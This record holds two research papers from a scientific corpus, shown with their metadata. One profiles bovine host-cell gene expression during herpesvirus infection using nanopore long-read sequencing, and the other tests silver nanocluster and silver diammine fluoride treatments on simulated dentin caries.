"pdf_hash": "b8647939054f2aaa564376d04f2084cf8f53a047",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
243028547 | pes2o/s2orc | v3-fos-license | Long-read Time-course Proling of the Host Cell Response to Herpesvirus Infection Using Nanopore and Synthetic Long-Read Transcriptome Sequencing
Third-generation sequencing is able to read full-length transcripts and thus to eciently identify RNA molecules and transcript isoforms, including transcript length and splice isoforms. In this study, we report the time-course proling of the effect of bovine alphaherpesvirus type 1 on the gene expression of bovine epithelial cells using direct cDNA sequencing carried out on MinION device of Oxford Nanopore Technologies. These investigations revealed a substantial up- and down-regulatory effect of the virus on several gene networks of the host cells, including those that are associated with antiviral response, as well as with viral transcription and translation. Additionally, we report a large number of novel bovine transcripts identied by nanopore and synthetic long-read sequencing. This study demonstrates that viral infection does not lead to a change in the average distance between promoters and transcription start sites, and between polyadenylation signals and transcription end sites. However, it causes differential expression of transcript isoforms. We could not detect an increased rate of transcriptional readthroughs as described in another alphaherpesvirus. According to our knowledge, this is the rst report on the use of LoopSeq for the analysis of eukaryotic transcriptomes. This is also the rst report on the application of nanopore sequencing for the kinetic characterization of cellular transcriptomes. This study also demonstrates the utility of nanopore sequencing for the characterization of dynamic changes of transcriptomes in any organisms. We our (GO) biological and molecular functions analysis these clusters we distinguished three functional groups. Genes basic cell functions, including morphogenesis, cell cycle regulation, signaling, catabolic pathways and respiration, are generally downregulated during viral infection. On the other hand, we observed a considerable upregulation of genes involved in antiviral response. Additionally, genes playing a role in transcription, RNA decay, translation and protein folding were also upregulated. Our analysis shows that most of these genes are associated to distinct molecular functions and biological processes indicating general response to virus infection. However, the rest of the unassociated genes could also be associated with either susceptibility to or defense against viral infection. We also identied a small set of immediate response genes that exhibited signicantly altered expression 1 hour after viral infection.
Introduction
Bovine alphaherpesvirus type 1 (BoHV-1) is a large DNA virus belonging to the Alphaherpesvirinae subfamily. This virus infects cattle and causes the disease commonly known as bovine respiratory disease, which leads to severe economic losses annually worldwide (van Oirschot, 1995). Like other alphaherpesviruses, such as herpes simplex virus type 1 (HSV-1), or pseudorabies virus (PRV), BoHV-1 also enters a latent state most commonly in the trigeminal ganglia following primary infection (Jones, 1998). From this state, the virus can be reactivated by various types of stress and can re-establish an acute infection (Nataraj et al., 1997).
Short-read sequencing (SRS) technology has expanded the frontiers of genomic and transcriptomic research due to its capacity to collect vast quantities of sequencing data at a relatively low cost. However, the past decade has witnessed incredible advances in long-read sequencing (LRS) technology. Besides the Paci c Biosciences and Oxford Nanopore Technologies platforms, Loop Genomics has recently also developed an LRS technique based on single molecule synthetic long-read sequencing (LoopSeq). LRS approaches present a strategy that is able to elude the limitations of SRS, including its ineffectiveness in the identi cation of transcript isoforms and in distinguishing overlapping RNA molecules. Recently, LRS techniques have been widely applied for the transcriptome analysis of a variety of organisms (Byrne et al., 2017;Chen et al., 2017;Tombácz et al., 2018a;Boldogkői et al., 2019;Zhao et al., 2019), including herpesviruses (Balázs et These studies have uncovered a far more complex transcriptional landscape of the examined species than previously thought. Genome-wide sequencing assays have annotated the global transcriptome of BoHV-1 (Moldován et al., 2020), including microRNAs (Glazov et al., 2010). The effect of herpesvirus infection on host cell transcription using SRS (Illumina HiSeq) has been characterized by (Hu et al., 2016). In this paper, the authors described alternative splicing and polyadenylation in human skin broblast cells due to the infection by HSV-1.
In this work, we carried out a time-lapse assay for the examination of the effect of
Pre-processing and data analysis
The MinION data was base called using the Guppy base caller v. 3.4.1. with --qscore_ ltering. Reads with a Q-score greater than 7 were mapped to the host genome [Bos taurus Gene Bank accession GCF_002263795.1] using the Minimap2 aligner (Li, 2018).
Analysis of host cell gene expression
In order to assess the effect of the infection on host gene expression, we excluded MAPQ=0, secondary and supplementary alignments from all downstream analysis. The reads aligned to the host genome were associated to host genes according to the GCF_002263795.1_ARS-UCD1.2_genomic.gff genome coordinates. Only reads matching the exon structure of the host reference genes (using a +/-5 base pair window for matching exon start and end positions) were counted. We used edgeR_3.24.3 (McCarthy et al., 2012) with R version 3.5.1 for differential expression (DE) analysis, and ltered out host genes with less than ten reads in any of the three biological replicates. Since we had mock, 1h, 2h, 4h, 6h, 8h, 12h measurements, we used the GLM model (robust=True) and the TMM normalization method in the edgeR analysis. In our model, we tested for DE against mock expression for each time point using data from three biological replicates. To detect genes with signi cantly changed expression levels, we applied a 0.01 false discovery rate (FDR) threshold, with p-values adjusted by the Benjamini & Hochberg procedure.
Medians of normalized pseudo-counts of DE genes were exported from edgeR (Supplementary table S1). Gene expression levels were normalized to maximal expression levels and were then compared to each other to reveal which genes had similar expression kinetics during viral infection. Genes were clustered by their relative expression pro le using the amap_0.8-16 R package Kmeans function with the Euclidean distance method. Based on the Calinski criteria, our dataset had an optimal cluster number of 6. Using the identi ed subset of genes, we performed overrepresentation analysis for each cluster using the number of expressed genes as reference via the PANTHER (version 14.1 using the 2018_04 dataset release) (Mi et al., 2013) software tool. We summarized the results of our over-representation analysis (FDR<0.05) using the Gene Ontology (GO) biological processes and GO molecular functions annotation datasets.
Schematic representation of the work ow is shown in Supplementary Figure S1.
Annotation of Bos taurus transcripts
In this work, we applied the following techniques for the analysis of bovine transcriptome: (1) direct cDNA sequencing (dcDNA-Seq) based on oligo(dT)-primed reverse transcription (RT), (2) ampli ed cDNA sequencing based on random-oligonucleotide-primed RT using nanopore sequencing on ONT MinION platform, as well as (3) synthetic long-read sequencing (LoopSeq) on Illumina platform. All of the three techniques were used for bovine transcript annotation, whereas dcDNA-Seq was used for the time-varying analysis of the effect of BoHV-1 on host cell gene expression. For transcript detection and annotation, mapped reads were analyzed using the LoRTIA software suite developed in our laboratory (https://github.com/zsolt-balazs/LoRTIA).
For the annotation of introns, transcription start sites (TSSs), and transcription end sites (TESs), we set the criterion that these sequences have to be identi ed by the LoRTIA suit in at least two independent bovine cell samples. With this restriction, we identi ed altogether 11,025 TSSs, 21,317 TESs and 139,771 introns (Supplementary Table S2). Additionally, LoRTIA produced a total of 227,672 bovine transcripts (Supplementary Data Item S1). The median length of these transcripts was 1,678 nt (σ =2,386.5).
Three biological replicates were prepared for each time-point in dcDNA sequencing used for the timelapse experiment. Seven time points post infection (p.i.) and a mock-infected sample was used in each replicate for this part of the analysis ( Supplementary Fig. S1).
We identi ed consensus TATA boxes at a mean distance of 31.15 nt (σ = 2.96) upstream of bovine TSSs.
The polyadenylation signals (PASs) were located at a mean distance of 25.35 nt (σ = 8.26) upstream of the host TES. Our data show that viral infection does not induce signi cant changes in the distance between promoters and TSSs as well as between PASs and TESs ( Figure 1A and 1B). No signi cant modi cation was found in the sequence of the ±5 nt surrounding region of the TSS and the ±50 nt surrounding region of bovine gene TESs during the infection ( Figure 1C and 1D).
To assess changes in splicing, and the usage of TSSs and TESs of the host cell during BoHV-1 infection, we evaluated transcripts represented by more than ten reads in the infected samples (n = 69,726) reported by LoRTIA. We detected altogether 130 alternatively spliced transcripts ( Figure 2A).
FOS, an immediate responder of the stress signaling pathway, is quickly degraded if its third intron is retained (Jurado et al., 2007). We detected a non-spliced variant of FOS in very low abundance and additional splice variants of the transcript lacking the above-mentioned exon, which were present starting from the rst hour of the infection ( Figure 2B). This con rms previous reports on the presence of FOS in the early stages of viral infections (Rubio and Martin-Clemente, 1999;Hu et al., 2016).
The 3'-UTRs of genes often contain miRNA targets, contributing to mRNA degradation. Thus, shorter 3'-UTR length can lead to increased transcript stability (Mayr and Bartel, 2009), whereas longer 3'-UTRs can be targeted by several miRNAs and other trans-acting elements thereby generating distinct regulation patterns (Pereira et al., 2017). We detected 72 transcripts with TESs located further downstream and 122 transcripts with TESs located more upstream compared to transcripts in mock samples. Superoxide dismutase 1 (SOD1) confers protection against oxidative damage (Miao and St. Clair, 2009), including that induced by the IFN-I signaling (Bhattacharya et al., 2015). A 3'-UTR isoform of SOD1 detected in infected cells was shorter than that of found in the mock sample ( Figure 2C).
A previous work reported the disruption of transcript termination in the host caused by HSV-1 infection, resulting in extensive transcriptional overlaps between adjacent gene products (Rutkowski et al., 2015). According to our results, the length of polyadenylated transcripts remained constant during the infection (Figure 3). In order to investigate whether disruption of transcript termination also occurs in BoHV-1infected bovine cells and results non-polyadenylated transcripts, we carried out ONT sequencing based on random oligonucleotide-primed RT, and the obtained dataset was used for the analysis of transcription activity at the intergenic regions. Despite this library yielding a comparable measure of reads mapping to Bos taurus (n=2,222,987), we were unable to detect any substantial amount of fragments mapping to the intergenic regions.
Using LRS, we were able to differentiate between TSS isoforms. We detected 80 transcripts with upstream and 142 with downstream TSSs.
Overall host cell gene expression during the 12 hours of virus infection
This study investigated the effect of viral infection on the cultured bovine cells by a time-course transcriptome analysis using ONT LRS analysis. We carried out direct cDNA sequencing using three biological replicates in each of the six time-points (1h, 2h, 4h, 6h, 8h, 12h) and in the mock-infected sample. We identi ed a total of 8,342 host genes that produced more than ten transcripts in each of the three biological replicates. Applying differential expression (DE) analysis with a 0.01 false discovery rate (FDR) threshold, we identi ed 686 genes among the 8,342 host genes that exhibited signi cantly altered expression levels during the course of virus infection. Genes were clustered by their expression pro le and not by their absolute expression levels. In this part of the analysis, we transformed the time series of expression levels to a relative scale representing the expression changes between sampling points. This allowed to cluster the genes by their expression pro les during the course of viral transfection instead of their absolute abundance. We identi ed six clusters of genes with distinctive expression pro les ( Figure 4A and 4B and Supplementary Table S3). By analyzing mean expression pro les of gene clusters, we identi ed four groups of genes (clusters 2-5) that were constantly upregulated, a single group of genes where expression levels were steadily downregulated throughout the entire period of virus infection (cluster 6), and nally, one group that showed initial upregulation followed by downregulation (cluster 1).
We performed an over-representation analysis using the 8,342 genes as reference with the PANTHER software tool. We summarized the results of this analysis using GO (Gene Ontology) biological processes and GO molecular functions annotation datasets in Supplementary Table S3 (an FDR<0.05 was used). Over-represented genes were categorized into six functional groups according to the GO database ( Figure 4C) as follows: 296 genes play a role in cellular metabolism, 257 are involved in transcription and RNA decay, 242 in developmental and morphogenetic processes, 187 in immune response and host defense, 161 in translation and protein folding, whereas 61 genes are speci cally associated with in viral transcription related processes.
Genes of the rst cluster (n=53) had medium expression preceding the infection (which was transiently slightly upregulated at the 1h, and 2h p.i. time points) followed by downregulation at later measurements.
Genes in this cluster were over-represented in pathways controlling a wide variety of developmental and morphogenetic processes. Several genes coding transcription regulatory proteins present in this cluster show diminishing expression throughout the infection. Genes involved in the cytokine regulation of the immune response and in ammatory processes are also affected. The second and third cluster of genes (n=64, n=82 respectively) had medium expression preceding the infection that rose at each consecutive time points. The genes of these clusters were over-represented in functions and molecular processes that can be associated with viral gene expression and the virion assembly. An upregulation of genes involved in transcriptional and translational processes, as well as RNA decay was also observed. RNA decay can be an immediate response of the host cell to counteract the accumulation of viral transcripts, or it may be an effort of the virus to eliminate competing host mRNAs in order to facilitate the translation of viral transcripts (Smiley, 2004;Moon and Wilusz, 2013). Some of the over represented genes in these cluster are the members of GO molecular functions that have overlapping sets of genes. For example, the 12 genes (RPS26, RPL5, RPL30, RPS29, RPL31, RPS6, RPL36, RPL37, RPL8, RPS10, RPS21, RPL19) that were signi cantly upregulated during infection are the members of both the "viral transcription" and the "SRP-dependent co-translational protein targeting to membrane" pathways. Many of these genes are also members of the "nuclear-transcribed mRNA catabolic process, nonsense-mediated decay" pathway.
Genes in the fourth cluster (n=64) had low relative expression preceding the infection. These genes were upregulated following a sigmoid curve during the infection. Genes in the fourth cluster were not signi cantly over-represented in any of the GO molecular functions or GO biological processes. The fth cluster of genes (n=88) had zero or negligible expression preceding infection but showed an exponential increase in expression during the course of infection. The over-represented genes of this cluster were associated with anti-viral cellular and defense responses such as the type I interferon signaling pathways. The sixth cluster of genes (n=335) consisted of a huge variety of host genes with high expression preceding viral infection that showed sharp downregulation during the infection. These genes were over-represented in pathways associated with protein folding, cell cycle regulation and mitochondrial processes including aerobic respiration.
Key response host genes
We performed DE analysis (with FDR=0.01) on the Mock and 1-hour expression values to describe the immediate response of host cells. We identi ed 6 bovine genes that were signi cantly down regulated and 19 genes that were signi cantly up regulated in the three biological replicates (Supplementary table S1). Over expression analysis revealed no signi cant association to either of the GO biological processes or GO molecular functions using the subset of up and down regulated genes or the whole set of genes. However, STRING association analysis revealed 4 networks between these genes. The rst gene network (GADD45B, GADD45A, DDIT3, ATF3, IFRD1, CARM1, SQSTM1) contains genes that are associated to host DNA damage response, transcription regulation. Furthermore, one gene plays a role in selective automacrophagy. The second network consists of two of the interferon gamma stimulated genes; IRF9, a transcription factor that plays an essential role in anti-viral activity and MT2A, a metallothionein protein.
The third network consists of two genes (SRSF5 and HNRNPDL) associated with pre-mRNA processing, transport and splicing regulation. The cytokine IL11which regulates hematopoietic cells was part of the fourth network. We found IL11 to be down-regulated. In contrast, CXCL5, a gene associated with neutrophil activation and also present in network 4, was up-regulated following virus infection. The remaining four (LASP1, HDAC7, SLC44A2 HSPG2) out of 6 down-regulated genes and eight (ID2, HMGN3, TMEM190, TSC22D1, PRKAR2B, LOC100847759, LOC100847143, LOC100174924) out of 19 upregulated genes include signaling, transcriptional regulator, developmental genes.
Discussion
High-throughput long-read sequencing approaches are able to read full-length transcripts, and therefore allow a more comprehensive annotation of RNA molecules. LRS-based studies led to the discovery that the transcriptomes are much more complex than previously thought.
In this study, we annotated a large number of bovine transcripts and analyzed the effect of viral infection upon host gene expression. We found no signi cant change in the usage of promoters or PASs of the host genes. However, we observed an altered usage of transcript length and splice isoforms of the host RNA molecules. This indicates a modulation of cellular mRNA turnover. The analysis of TSS isoforms suggests that viral infection may have an effect on host mRNA translation, potentially through uORFs (Kronstad et al., 2013), or through other cis-acting elements, such as miRNA binding sites of 5'-UTRs. However, downstream TSSs can also result in truncated in-frame ORFs, which might code for N-terminally truncated polypeptides (Crofts et al., 1998;Tombácz et al., 2019). Unlike in HSV-1-infected cells (Rutkowski et al., 2015), we found no increase in the extent of transcriptional readthroughs in BoHV-1infected-cells.
Based on the alteration of expression kinetics, we detected six distinct gene clusters that had signi cantly changed expression during the course of virus infection. Based on the overrepresentation analysis of these clusters we distinguished three functional groups. Genes involved in basic cell functions, including morphogenesis, cell cycle regulation, signaling, catabolic pathways and aerobe respiration, are generally downregulated during viral infection. On the other hand, we observed a considerable upregulation of genes involved in antiviral response. Additionally, genes playing a role in transcription, RNA decay, translation and protein folding were also upregulated. Our analysis shows that most of these genes are associated to distinct molecular functions and biological processes indicating general response to virus infection. However, the rest of the unassociated genes could also be associated with either susceptibility to or defense against viral infection. We also identi ed a small set of immediate response genes that exhibited signi cantly altered expression 1 hour after viral infection.
Altogether, our data provides valuable resources for future functional studies and for understanding how the virus can overcome host defense mechanisms. Furthermore, these results may be helpful for the development of novel antiviral therapies.
Declarations
Funding This study was supported by OTKA K 128247 granted to ZB, by the OTKA FK 128252 and by the Lendület (Momentum) I Program of the Hungarian Academy of Sciences (LP-2020/8) granted to DT. The funding body had no role in study design, data collection and interpretation, or the decision to submit the work for publication.
Data availability statement
The sequencing datasets generated during this study are available at the European Nucleotide Archive's SRA database under the accession PRJEB33511 (https://www.ebi.ac.uk/ena/browser/view/PRJEB33511).
Con ict of interest
The authors declare no con ict of interest. | 2021-08-25T17:18:43.580Z | 2021-02-22T00:00:00.000 | {
"year": 2021,
"sha1": "99d468384554b7ac27de27c0f46762f7085df428",
"oa_license": "CCBY",
"oa_url": "https://www.researchsquare.com/article/rs-264666/latest.pdf",
"oa_status": "GREEN",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "14009f20672def1edd246b04902d56f2caea4f7a",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": []
} |
265512696 | pes2o/s2orc | v3-fos-license | Application of 20% silver nanoclusters in polymethacrylic acid on simulated dentin caries; its penetration depth and effect on surface hardness
The aims of this study were: To evaluate the surface hardness of simulated dentin caries lesions treated with either silver nanoclusters (AgNCls) synthesized in polymethacrylic acid (PMAA) or 38% silver diammine fluoride (SDF), as well as observe the penetration of the treatment solutions into the simulated caries lesions. Dentin blocks 4 mm thick obtained from caries-free third molars were sectioned and then simulated caries lesions on the occlusal dentin surfaces were created. Each specimen (n = 8) was divided into four sections: (A) treated with 20% AgNCls/PMAA; (B) treated with SDF 38% (FAgamin, Tedequim, Cordoba, Argentina); (C) sound tooth protected by nail-varnish during artificial caries generation (positive control); and (D) artificial caries lesion without surface treatment (negative control). AgNCls/PMAA or SDF were applied on the simulated lesions with a microbrush for 10 s, then excess removed. The surface hardness was measured by means of Vickers indentation test. To trace the depth of penetration, up to 400 μm, of silver ions, elemental composition of the samples was observed using EDX, coupled with SEM, and measured every 50 μm from the surface towards the pulp chamber. Laser Induced Breakdown Spectroscopy (LIBS) was also employed to trace silver ion penetration; the atomic silver line 328.06 nm was used with a 60 μm laser spot size to a depth of 240 μm. Student’s-t test identified significant differences between treatment groups for each depth and the Bonferroni test was used for statistical analysis of all groups (p < 0.05). Mean surface hardness values obtained were 111.2 MPa, 72.3 MPa, 103.3 MPa and 50.5 MPa for groups A, B, C and D respectively. There was a significant difference between groups A and C compared with groups B and D, the group treated with AgNCls/PMAA achieved the highest surface hardness, similar or higher than the sound dentin control. A constant presence of silver was observed throughout the depth of the sample for group A, while group B showed a peak concentration of silver at the surface with a significant drop beyond 50 μm. The 20% AgNCls/PMAA solution applied to simulated dentin caries lesions achieved the recovery of surface hardness equivalent to sound dentin with the penetration of silver ions throughout the depth of the lesion.
The increasing trend for preserving the structure of caries lesions using agents such as Silver Diammine Fluoride as part of the initial treatment has promoted the resurgence of non-surgical strategies for the recovery of enamel and dentin affected by the demineralization process.The most commonly used concentration of SDF is 38% (44,800 ppm F) with a reported clinical efficacy in arresting progression of dentinal caries found to be around 65.9% 1 .SDF in topical solutions has been shown to form silver phosphate that, when applied to carious lesions, rapidly turns black under the influence of reducing agents such as sunlight.The oxidation that occurs within the dental structures, which is the cause of the dark staining, is a controversial feature of SDF 2 .The discoloration effect on carious teeth is the most distinct deficiency of SDF and may therefore limit its clinical use in patients demanding more esthetic treatment outcomes.
Efforts have been made to counteract the staining effect of SDF by applying potassium iodide (KI) in a second step to prevent staining through the precipitation of excess silver ions as white silver iodide crystals 3,4 .Although most of the reports show that KI application after SDF treatment significantly reduced tooth staining for a short time, others suggest masking the SDF-treated surface with a tooth-colored restorative material, namely resinmodified or high viscosity glass ionomer cement, or a resin composite, with variable success as a darkened marginal stain typically remains if not tooth preparation occurs 3,5 .Potassium fluoride (KF) and silver nitrate (AgNO 3 ) have also been proposed to mitigate SDF-mediated staining as well as polyethylene glycol (PEG)-coated nanoparticles containing sodium fluoride (NaF), and nanosilver fluoride (NSF) 5 .
The dentin architecture is disrupted when a caries lesion develops through the process of demineralization.Remineralization in dentin may take place when minerals interact with the undamaged organic matrix of the dentin.However, remineralization becomes more difficult when the matrix is more abundant.More than 90% of the organic component in dentin is Type I collagen, which provides the structural framework for apatite deposition and facilitates the enhancement of the mechanical properties of dentin 6,7 .Dentin collagen mineralization can be extrafibrillar and intrafibrillar.The former occurs in the intervals between collagen fibrils, while the latter occurs in the gaps, with the depositing minerals extending into the fibrils.In nature, only intrafibrillar mineralization in collagen fibrils may reproduce the original hierarchy of the mineral structure as in sound dentin, resulting in its optimized physical properties.
According to Minimally Invasive Dentistry principles, since the outer layer (the old term of infected dentin) is irreversibly denatured and cannot be remineralized, it should be removed; however, the inner layer (cariesaffected dentin) can be remineralized 8 .Moreover, the remineralization of demineralized dentin is critical for improving bonding stability and preventing primary and recurrent caries lesions.On the other hand, laboratory research has indicated that only mineralized collagen fibrils can stop the degradation caused by MMPs and aging, and can thus restore the hardness of natural mineralized dentin, remove the action of these enzymes, and maintain the stability of the resin-dentin interface 9 .Functional mineralization by means of polymer induced liquid precursors (PILP) 10 has been proposed to achieve intrafibrillar remineralization whereas the mechanism of SDF in arresting dental caries seems to be supported by extrafibrillar mineralization combined with the inhibition of the growth of cariogenic pathogens.
To avoid staining of the recovered structures, a prototype infiltrating/remineralizing solution was developed using silver nanostructures that do not undergo this oxidation.Preliminary studies showed that silver nanoclusters synthesized in polymethacrylic acid (AgNCls/PMAA) did not generate color changes in artificial caries lesions in dentin, compared to a solution of 38% silver diammine fluoride.Furthermore, the application of this solution significantly increased the adhesion of a glass ionomer restorative cement 11 .As mentioned, the vehicle of the silver nanoclusters is a polymeric acid, similar to those applied with the PILP prototypes to achieve functional (intrafibrillar) mineralization.Therefore, it was hypothesized that, in addition to the improvements in optical and adhesive properties, this solution of 20% AgNCls/PMAA may increase surface hardness of artificial caries lesions as well as evenly penetrate throughout the depth of the lesion.
In order to extend the assessment of other properties to characterize the development of this solution as a potential non-restorative treatment option for caries lesions, the effect of its topical application on a demineralized dentin surface as well as the penetration into the demineralized dentin were investigated.The aims of this study were: (a) to compare the surface hardness of artificial caries lesions in dentin treated with either 20% AgNCls/PMAA or 38% SDF, and (b) to evaluate the depth of penetration of silver ions into the demineralized dentin using either treatment option.
Materials and methods
All experimental protocols were approved by the secretary of research and development, Universidad Católica de Cordoba, Argentina (SI-UCC research grants) and by the National Agency for Research under the research grant FONCYT-PICT2020 Serie A #00539, and PICT2019 N 241, CONICET-PIP, PRIMAR2017 (SECyT/UNC).All methods were carried out in accordance with relevant guidelines and regulations.
Preparation of samples
Two batches of eight non-carious third molars were obtained from the Bank of Human Teeth, Faculty of Dentistry, Universidad Nacional de Cordoba, Argentina (Ord.3/16HCD and Res.333/17 HCD); one batch was used for the Microhardness test whereas the second batch, for tracing silver ions using LIBS first, followed by EDX analysis.
Dentin blocks, 4 mm thick, were obtained by removing the occlusal enamel using a water-cooled low-speed cutting machine (Buehler, Germany) perpendicular to the long axis of the tooth to obtain flat mid-coronal dentin surfaces.These were sequentially polished with 400 to 1200-grit silicon carbide papers followed by coating with nail varnish (Revlon, New York, USA) to leave an exposed window 5 × 5 mm on the occlusal dentin surface for www.nature.com/scientificreports/production of demineralized dentin to simulate dental caries and preserving the sound dentin surfaces covered by the nail varnish for later comparison.
Samples were immersed for 66 h in a solution containing 0.05 M acetate buffer, 2.2 mM calcium phosphate adjusted to pH 5.0 to generate a demineralized layer of approximately 150-200 μm deep to simulate a carious lesion 12 .
Once the artificial lesions were produced, four slices 1.5 mm thick from each specimen were cut from occlusal to apical region, and carefully secured in a positioner shelf to receive either treatment as displayed in Fig. 1.Specimens were divided into the following groups: 1. Treated with 20% AgNCls/PMAA 11 ; the solution was applied to the exposed demineralized surface with a microbrush for 10 s then incubated at 37 °C and 100% relative humidity for 24 h; 2. Treated with SDF 38% (FAgamin, Tedequim, Cordoba, Argentina); the solution was applied on the exposed demineralized surface with a microbrush for 10 s, left to rest for 180 s and excess was removed with a cotton pellet 13 , then incubated at 37 °C and 100% relative humidity for 24 h; 3. Sound tooth structure protected by nail varnish during artificial caries generation and incubated for 24 h at 37 °C and 100% relative humidity (positive control); and, 4. Control (no treatment); exposed demineralized surfaces were left untreated then incubated for 24 h at 37 °C and 100% relative humidity (negative control).
Surface hardness
The hardness test was performed at room temperature by the Vickers indentation test, using a hardness tester (Microhardness Tester FM-300; Future-Tech Corp, Fujisaki, Kanagawa, Japan) consisting of a pyramidal diamond indenter.
Vickers hardness (HV) values were determined by performing 5 indentations in different locations on each specimen with a load of 100 g for 10 s on the polished surface.
Depth of penetration of silver ions
Laser Induced Breakdown Spectroscopy.A diagram for the Laser Induced Breakdown Spectroscopy (LIBS) system is shown in Fig. 2. A Q-switched Nd:YAG laser (Surelite I, Continuun), operating at its third harmonic wavelength (355 nm) was used to initiate the ablation.The laser beam was directed to the sample using dichroic mirrors and was focused using a 5 cm focal length achromatic lens.The sample was positioned at the focal plane of the lens in order to create craters close to the optical diffraction limit.An XYZ motorized stage was used for positioning the sample.Images of the sample were acquired by an instrument coupled webcam.A UV-Vis Fiber A spot size of 60 μm was used and 8 sampling spots separated 30 μm apart from each other were studied to achieve a penetration depth of 240 μm.A silver atomic line at 328.06 nm was selected since spectral interference was not observed and it is one of the most intense emission lines for silver.SEM/EDX.SEM analyses were subsequently performed as an alternative procedure to measure the depth of penetration of silver ions using the same specimens.Images were acquired using a Philips SEM (XL30, Netherlands).The elemental composition of the samples was observed using EDX, coupled with SEM.Specimens were sputter-coated with gold (Q150R ES, Quorum Technologies, East Sussex, UK) with an operating current of 23 mA.The specimen surface was then examined using a scanning electron microscope (SEM, JSM 7800F, JEOL Ltd., Tokyo, Japan) with an accelerating voltage of 5 kV and a magnification ranging from 2500 × to 20,000 ×.
Elemental analysis was performed using a dispersive X-ray spectrometer (EDX, X-Max 20, Oxford Instruments, Abingdon, UK) to determine the elemental composition (Ca, P, Ag, or F) of the precipitate on representative specimens.The chemical element mapping was performed using EDX, tracing the silver signal.Three random lines from the outer surface of the lesion and up to 400 μm deep served to quantify the presence of silver at 50 μm intervals at a magnification of 20,000 × and a beam voltage set at 5 kV.An average elemental value was expressed as %weight/volume of silver, and recorded for each depth.A quantitative analysis of the presence of silver ions was performed at 50 μm increments up to 400 μm from the surface (8 sub-segments).
Statistical analysis
For the Microhardness test, the average of the five measurements obtained on each specimen was recorded in an Excel file.Statistical analysis was performed using ANOVA with the significance set at the 95% confidence level (p < 0.05).Statistical differences between groups for surface hardness were determined using the Bonferroni test (p < 0.05).To determine differences between the two treatment options at each depth, Student's-t test was used with significance set at p < 0.05, whereas significant concentration differences at all depths of penetration were determined by means of the SNK test set at α = 0.05.
Statement of ethics
All experimental protocols were approved by the secretary of research and development, Universidad Católica de Córdoba, Argentina (SI-UCC research grants) and by the National Agency for Research under the research grant FONCYT-PICT2020 Serie A #00539, and PICT2019 N 241, CONICET-PIP, PRIMAR2017 (SeCyT/UNC).All methods were carried out in accordance with relevant guidelines and regulations.
Informed consent was obtained from all subjects and/or their legal guardian(s) who donated their teeth to the Bank of Human Teeth, Faculty of Dentistry, Universidad Nacional de Cordoba, Argentina (Ord.3/16HCD and Res.333/17 HCD).
Surface hardness
Table 1 shows the mean values obtained for each experimental group A, B, C and D being, 111.2 MPa, 72.3 MPa, 103.3 MPa and 50.5 MPa respectively.The results showed significant differences between groups A (treated with AgNCls/PMAA) and C (sound dentin) in relation to groups B (treated with SDF) and D (demineralized dentin) (p = 0.01).The group treated with the 20% AgNCls/PMAA solution achieved the highest microhardness value, similar to/or higher than that of sound dentine.www.nature.com/scientificreports/
Depth of penetration of silver ions
EDX was used to verify the presence of elemental silver in the SEM images of groups C and D. The EDX analyses confirmed the lack of detectable silver in non-demineralized samples as well as in untreated control lesions.While for groups A and B, the depth of penetration from 0 to 400 µm of silver quantified by weight % was verified.
As shown in Table 2 and in Fig. 3, there is a greater presence of silver on the surface ranging from 0 to 50 µm for the group treated with 38% SDF, while the group treated with 20% AgNCl/PMAA maintained significant and constant amounts of silver throughout the entire lesion depths, from 0 to 400 µm.
The analysis by LIBS was carried out on 8 points from one specimen from each treatment group, namely one specimen treated with 38% SDF and the other treated with 20% AgNCl/PMAA.For each sample 8 craters of one-pulse were made and the emission intensity of 328.06 nm line from Ag was recorded.The variation of the intensity of the silver atomic line by depth is expressed in Table 3 and Fig. 4.
The intensity of the atomic line revealed a greater concentration of silver on the surface for each group.Although the group treated with 38% SDF initially showed higher intensity values compared with the samples from the 20% AgNCl/PMAA group, according to the reason that the silver concentration of the SDF solution is higher than the corresponding concentration of the AgNCl/PMAA solution.The readings of the SEM graphs show that, as depth increased, the silver concentration of the samples treated with 38% SDF decreased more rapidly than the samples treated with 20% AgNCl/PMAA.The silver concentration of the group treated with 20% AgNCl/PMAA remained almost constant and from 150 µm onwards the concentrations for both treatment groups were not statistically different (p > 0.05).
Discussion/conclusion
It is suggested that, to recover functional and physical properties of dentin that can be remineralized, the remineralizing agent must reach the base of the lesion and deliver the chemical compounds from the bottom-up that will provide structural form and strength to the collagen network.However, how to measure the depth of penetration offers a challenge, even in laboratory models.Studies based on transverse microradiography alone provide information only on mineral density and do not provide ultrastructural evidence of intrafibrillar remineralization that is critical for restoring the mechanical properties of the remineralized dentin matrix.Thus, to test the hypothesis of this study, it used a combination of mineral density assessment by means of a scanning electron microscope (SEM) coupled with a dispersive X-ray spectrometer, and the evaluation of dynamic mechanical properties of the remineralized dentin by testing the microhardness of the surface exposed to the two remineralizing solutions.
The results obtained in the present study show similar values to other published data that found the Vickers hardness of natural dentin (ND) was 75.1 ± 3.2 MPa, decreasing to 55.2 ± 2.9 MPa after demineralization of the dentin (DD) 8 .In that study, when these surfaces were treated with a biomimetic mineralizing solution, the demineralized dentin was remineralized, reaching hardness values of 68.5 ± 2.5 MPa in the biomimetic mineralized dentin (BMD) group.The BMD group also showed higher hardness values than the DD, the ND and conventional mineralized dentin.
In the present study, the highest values for surface hardness were observed in the AgNCls/PMAA group, which contains no fluoride in its composition.It is hypothesized that it was the PMAA that could have modified the disposition of collagen fibers, consolidating a tight and dense network with improved mechanical properties.In the evaluation of the hypothesis, one must also consider the limitations of the artificial caries model that has been universally employed for the evaluation of dentin remineralization.Unlike artificial carious lesions, naturally occurring caries-affected dentin produced by bacterial acid challenge in the oral cavity is highly heterogeneous and the dentinal tubules are occluded by minerals that restrict diffusion of large molecular species into the intertubular collagen matrix 14,15 .www.nature.com/scientificreports/Remineralization of demineralized dentin is attributed to the high concentration of fluoride in SDF whereas silver is responsible for the antibacterial effect.Silver ion penetration studies showed that it is distributed throughout the affected area, even penetrating into parts of the healthy dentin.This fact had already been demonstrated in previous work using SDF via an EDX technique 16 .The results of the current study show that both compounds penetrated the demineralized tissues, but the 38% SDF showed a less homogeneous distribution of silver ions than the samples treated with 20% AgNCl/PMAA.It is known that silver can inhibit bacterial growth as it interacts with bacterial cell membranes and enzymes as well as being able to dope the hydroxyapatite.This silver-doped hydroxyapatite increases the antibacterial effect and prolongs its presence over time 17 .As the samples treated with 20% AgNCl/PMAA showed a better and more homogeneous distribution of ions, it might be assumed that the antibacterial effect is likely to homogeneously cover the affected area.
